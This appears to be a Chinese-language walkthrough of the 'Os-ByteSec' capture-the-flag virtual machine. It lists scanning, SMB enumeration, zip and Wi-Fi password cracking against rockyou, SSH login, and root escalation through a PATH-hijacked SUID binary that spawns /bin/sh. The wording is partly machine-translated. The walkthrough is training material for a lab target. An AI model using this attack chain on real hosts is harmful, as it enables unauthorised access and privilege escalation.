Os-ByteSec
主机发现1 netdiscover -i eth0 -r 192.168.170.0/24https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429101500969-464646422.png
端口扫描
1 nmap -sV 192.168.170.145https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429101538415-839198865.png
访问80端口,提示使用smb攻击
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429101651236-1506109686.png
目次扫描,未发现有代价的信息
1 dirb http://192.168.170.145/https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429102103402-1215135965.png
SMB渗出
SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,允许应用步伐和终端用户从远端的文件服务器访问文件资源
查询靶机中的用户
1 enum4linux -U 192.168.170.145enum4linux是用于罗列系统上的SMB服务的工具,可以轻松的从与SMB服务有关的目标中快速提取信息
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429103150309-902784702.png
爆破smb用户的暗码,暗码为空
1 acccheck -t 192.168.170.145 -u smb -vhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429104237260-2006000519.png
罗列靶机的共享资源
1 smbmap -u 'smb' -p '' -H 192.168.170.145https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429105403091-1759326762.png
查看靶机的共享目次
1 smbclient -L 192.168.170.145 -U smbhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429105529868-584931425.png
通过SMB登录靶机
1 smbclient //192.168.170.145/print$ -U smbhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429105618453-1538569454.png
发现文件满是0字节,但是还有一个.目次,尝试进入
1 smbclient //192.168.170.145/smb -U smbhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429110008300-1669840904.png
下载main.txt查看内容,无有效信息
1 get main.txthttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429110407566-687970845.png
下载safe.zip进行解压
1 get safe.ziphttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429110510323-1218840655.png
发现需要暗码,破解得到暗码为hacker1
1 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.ziphttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429111114340-663611994.png
解压得到两个文件,secret.jpg和user.cap,打开图片未发现有效信息,然后打开流量包发现是个无线数据包,wifi名称为blackjax
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429112314387-1147976758.png
使用aircrack-ng破解user.cap文件,得到暗码为snowflake
1 aircrack-ng -w /usr/share/wordlists/rockyou.txt user.caphttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429112555165-589484654.png
登录ssh,得到第一个flag
1 ssh blackjax@192.168.170.145 -p 2525https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429112948607-88221824.png
发现该用户不能执行sudo
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429113233974-782528635.png
查看系统中带SUID的步伐
1 find / -user root -perm -4000 -print 2>/dev/nullhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429113325536-773945915.png
执行netscan命令
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429113700131-1276294483.png
下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令
1 scp -P 2525 blackjax@192.168.170.145:/usr/bin/netscan /tmp
2 strace -f /tmp/netscanhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429114027193-125946006.png
通过劫持环境变量来让netscan在执行时执行其他命令
1 #tmp有写权限
2 echo "/bin/sh" > /tmp/netstat
3 chmod 777 /tmp/netstat
4 export PATH=/tmp:$PATH
5 netscanhttps://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429114804695-2147087822.png
乐成提权,得到第二个flag
https://img2024.cnblogs.com/blog/3216597/202404/3216597-20240429114910807-1608157042.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]